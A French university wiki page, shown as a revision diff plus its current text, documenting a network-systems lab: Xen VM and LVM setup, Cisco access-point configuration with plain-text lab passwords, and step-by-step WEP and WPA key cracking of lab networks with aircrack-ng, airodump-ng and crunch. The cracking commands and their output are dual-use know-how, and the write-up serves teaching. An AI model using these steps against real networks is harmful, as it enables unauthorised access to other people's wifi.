TP sysres IMA2a5 2021/2022 G12 : Différence entre versions

De Wiki d'activités IMA
(Craquage de clés :)
(Configuration du point d'accès wifi)
Ligne 57 : Ligne 57 :
 
== Configuration du point d'accès wifi ==
 
== Configuration du point d'accès wifi ==
  
Réinitialisation des paramètres de la borne wifi :
+
'''Réinitialisation des paramètres de la borne wifi :'''
  
erase startup config
+
erase startup config
reload
+
reload
  
Configuration de base :
+
'''Configuration de base :'''
  
ap>enable
+
ap>enable
ap#configure terminal
+
ap#configure terminal
  
Configuration du nom d'hôte :
+
'''Configuration du nom d'hôte :'''
  
ap(config)#hostname SE2A5-AP1
+
ap(config)#hostname SE2A5-AP1
  
Accès ssh :
+
'''Accès ssh :'''
  
SE2A5-AP1(config)#aaa new-model
+
SE2A5-AP1(config)#aaa new-model
SE2A5-AP1(config)#username admin privilege 15 secret glopglop
+
SE2A5-AP1(config)#username admin privilege 15 secret glopglop
SE2A5-AP1(config)#ip domain-name plil.info
+
SE2A5-AP1(config)#ip domain-name plil.info
SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048
+
SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048
SE2A5-AP1(config)#ip ssh version 2
+
SE2A5-AP1(config)#ip ssh version 2
SE2A5-AP1(config)#line vty 0 15
+
SE2A5-AP1(config)#line vty 0 15
SE2A5-AP1(config-line)#transport input ssh
+
SE2A5-AP1(config-line)#transport input ssh
SE2A5-AP1(config-line)#exit
+
SE2A5-AP1(config-line)#exit
  
Sécurisation des accès :
+
'''Sécurisation des accès :'''
  
SE2A5-AP1(config)#service password-encryption
+
SE2A5-AP1(config)#service password-encryption
SE2A5-AP1(config)#enable secret glopglop
+
SE2A5-AP1(config)#enable secret glopglop
SE2A5-AP1(config)#banner motd #Restricted Access#
+
SE2A5-AP1(config)#banner motd #Restricted Access#
  
VLAN 172
+
'''VLAN 172'''
 
 
aaa authentication login EAP_TOAD group RADIUS_BATTLEFIELD
 
radius-server host 193.48.57.172 auth-port 1812 acct-port 1813 key glopglop
 
aaa group server radius RADIUS_BATTLEFIELD
 
server 193.48.57.172 auth-port 1812 acct-port 1813
 
exit
 
dot11 ssid BATTLEFIELD1
 
mbssid guest-mode
 
vlan 172
 
authentication open eap EAP_BATTLEFIELD
 
authentication network-eap EAP_BATTLEFIELD
 
authentication key-management wpa
 
exit
 
interface dot11radio0.172
 
encapsulation dot1q 172
 
bridge-group 72
 
exit
 
interface g0.172
 
encapsulation dot1q 172
 
bridge-group 72
 
exit
 
interface dot11radio 0
 
no shutdown
 
encryption vlan 172 mode ciphers aes-ccm tkip
 
mbssid
 
ssid BATTLEFIELD1
 
exit
 
  
 +
aaa authentication login EAP_TOAD group RADIUS_BATTLEFIELD
 +
radius-server host 193.48.57.172 auth-port 1812 acct-port 1813 key glopglop
 +
aaa group server radius RADIUS_BATTLEFIELD
 +
server 193.48.57.172 auth-port 1812 acct-port 1813
 +
exit
 +
dot11 ssid BATTLEFIELD1
 +
mbssid guest-mode
 +
vlan 172
 +
authentication open eap EAP_BATTLEFIELD
 +
authentication network-eap EAP_BATTLEFIELD
 +
authentication key-management wpa
 +
exit
 +
interface dot11radio0.172
 +
encapsulation dot1q 172
 +
bridge-group 72
 +
exit
 +
interface g0.172
 +
encapsulation dot1q 172
 +
bridge-group 72
 +
exit
 +
interface dot11radio 0
 +
no shutdown
 +
encryption vlan 172 mode ciphers aes-ccm tkip
 +
mbssid
 +
ssid BATTLEFIELD1
 +
exit
  
 
== Craquage de clés ==
 
== Craquage de clés ==

Version du 29 novembre 2021 à 12:39

Création machine virtuelle

Dans un premier temps, on dois créer une machine virtuelle sur le serveur distant. On s'y connecte donc en tant que superuser :

 ssh -4 root@capbreton.plil.info

On créer alors la machine grâce à la commande qui suit :

 xen-create-image --force --hostname=Battlefield --ip=193.48.57.172 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster

La machine est alors créée sur capbreton. On passe à la configuration des disques, pour créer un RAID5 :

 lvcreate -L1G -n Battlefield1 virtual 
 lvcreate -L1G -n Battlefield2 virtual 
 lvcreate -L1G -n Battlefield3 virtual 
 lvcreate -L1G -n Battlefield4 virtual

On augmente ensuite la taille des 4 disques :

 lvextend -L +9G /dev/virtual/Battlefield1
 lvextend -L +9G /dev/virtual/Battlefield2
 lvextend -L +9G /dev/virtual/Battlefield3
 lvextend -L +9G /dev/virtual/Battlefield4


On vérifie que les disques sont bien installés :

 lvdisplay 

Détail d'un disque installé :

 --- Logical volume ---
 LV Path                /dev/virtual/Battlefield1
 LV Name                Battlefield1
 VG Name                virtual
 LV UUID                gvf9pC-5DAB-1YGt-fYJ1-ecrM-nZG2-ZFCf41
 LV Write Access        read/write
 LV Creation host, time capbreton, 2021-09-24 08:40:48 +0200
 LV Status              available
 # open                 0
 LV Size                10.00 GiB
 Current LE             2560
 Segments               2
 Allocation             inherit
 Read ahead sectors     auto
 - currently set to     256
 Block device           254:57

Puis on formate les disques :

mke2fs /dev/virtual/Battlefield1
mke2fs /dev/virtual/Battlefield2
mke2fs /dev/virtual/Battlefield3
mke2fs /dev/virtual/Battlefield4

Configuration du point d'accès wifi

Réinitialisation des paramètres de la borne wifi :

erase startup config
reload

Configuration de base :

ap>enable
ap#configure terminal

Configuration du nom d'hôte :

ap(config)#hostname SE2A5-AP1

Accès ssh :

SE2A5-AP1(config)#aaa new-model
SE2A5-AP1(config)#username admin privilege 15 secret glopglop
SE2A5-AP1(config)#ip domain-name plil.info
SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048
SE2A5-AP1(config)#ip ssh version 2
SE2A5-AP1(config)#line vty 0 15
SE2A5-AP1(config-line)#transport input ssh
SE2A5-AP1(config-line)#exit

Sécurisation des accès :

SE2A5-AP1(config)#service password-encryption
SE2A5-AP1(config)#enable secret glopglop
SE2A5-AP1(config)#banner motd #Restricted Access#

VLAN 172

aaa authentication login EAP_TOAD group RADIUS_BATTLEFIELD
radius-server host 193.48.57.172 auth-port 1812 acct-port 1813 key glopglop
aaa group server radius RADIUS_BATTLEFIELD
server 193.48.57.172 auth-port 1812 acct-port 1813
exit
dot11 ssid BATTLEFIELD1
mbssid guest-mode
vlan 172
authentication open eap EAP_BATTLEFIELD
authentication network-eap EAP_BATTLEFIELD
authentication key-management wpa
exit
interface dot11radio0.172
encapsulation dot1q 172
bridge-group 72
exit
interface g0.172
encapsulation dot1q 172
bridge-group 72
exit
interface dot11radio 0
no shutdown
encryption vlan 172 mode ciphers aes-ccm tkip
mbssid
ssid BATTLEFIELD1
exit

Craquage de clés

Craquage clé WEP

Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01".

Tout d'abord, on installe l'utilitaire aircrack-ng

 su -
 apt install aircrack-ng

On prend une clé USB Wifi et on vérifie qu'elle est reconnue par l'ordinateur :

 lsusb
Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 413c:2005 Dell Computer Corp. RT7D50 Keyboard
Bus 001 Device 007: ID 413c:301a Dell Computer Corp. 
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

La clé wifi est bien reconnue par le PC : Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter

On récupère le nom de l'interface de la clé Wifi :

airmon-ng 


On renomme l'interface en wlan0mon, nous allons utiliser la commande suivante pour passer la carte Wifi en monitor :

 airmon-ng start wlx40a5ef059e47

On va ensuite faire cette commande afin d'écouter les trames Wifi de la clé USB:

 airodump-ng wlan0mon

On obtient alors les informations suivantes :

BSSID                 PWR     Beacons    #Data,   #/s      CH      MB      ENC     CIPHER   AUTH ESSID
04:DA:D2:9C:50:50     -40           2      3       4        3      54e      WEP     WEP         cracotte01

On récupère dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte01 :

airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:50 wlan0mon

On attends qu'il y ai au moins 30 000 trames récupérées puis on lance le crackage de la clé :

 aircrack-ng lcrack-01.cap

Après 5-10min, on obtient le code de la clé Wifi :

                                   Aircrack-ng 1.5.2 


                      [00:00:00] Tested 721 keys (got 665952 IVs)

  KB    depth   byte(vote)
   0    1/  2   27(703488) 1D(696832) 92(694528) EB(692224) A6(689408) 9D(688896) 
   1    2/  1   D0(698112) 65(697344) A7(696320) 0D(695296) 21(693504) 3A(692224) 
   2    1/  3   9B(701440) FC(697344) 2E(695808) 6D(692224) 57(689152) CF(688640) 
   3    1/  5   BB(703232) 30(700416) A6(699392) AB(699136) C2(696064) 36(695296) 
   4   13/  4   35(687104) D6(686592) 76(686080) 23(685824) 48(685824) 63(685568) 

            KEY FOUND! [ 12:34:56:78:9A:BC:02:CB:A9:87:65:43:21 ] 

Decrypted correctly: 100%

Craquage clé WPA

On vérifie que notre utilitaire aircrack est bien installé, sinon on refait la commande :

apt-get install aircrack-ng

Listing de toutes les interfaces Wi-Fi

airmon-ng

On obtient la liste ci-dessous :

PHY	Interface	  Driver	  Chipset
phy0	wlx40a5ef059e47	  rt2800usb       Ralink Technology, Corp. RT5370 

On passe la carte Wifi en mode monitor :

airmon-ng start wlx40a5ef059e47	

On observe les trames de réseaux avec la commande :

airodump-ng wlan0mon

On récupère le BSSID de krakotte01 et le channel : 44:AD:D9:5F:87:00 sur le channel 8 On enregistre alors les trames qui passent sur krakotte01 dans un fichier krakotte.txt :

airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w krakotte.txt wlan0mon

On attend environ 1/4 d'heure pour récupérer suffisamment de trames.

Exécution de Aircrack :

On créé alors un dictionnare contenant l'ensemble des mots de passes potentiels. On sait que la clé WPA est composée de 8 chiffres aléatoires, donc le dictionnaire contient 100 000 000 possibilités et est créé grâce à la commande suivante :

crunch 8 8 0123456789 >> dico.txt

Pour accélerer le processus de crackage, on divise le dictionnaire en 5 fichiers :

split -b 200m dico.txt

On peut vérifier que cela a bien fonctionné en regardant le contenu des fichiers générés

ls
>> xaa
>> xab
>> xac
>> xad
>> xae

Posséder ces différents fichiers va me permettre d'exécuter la commande aircrack-ng sur d'autres zabeth de manière à diminuer le temps de recherche du mot de passe.

Cassage de la clef WPA :

aircrack-ng -w xaa krakotte01.cap
aircrack-ng -w xab krakotte01.cap
aircrack-ng -w xac krakotte01.cap
aircrack-ng -w xad krakotte01.cap
aircrack-ng -w xae krakotte01.cap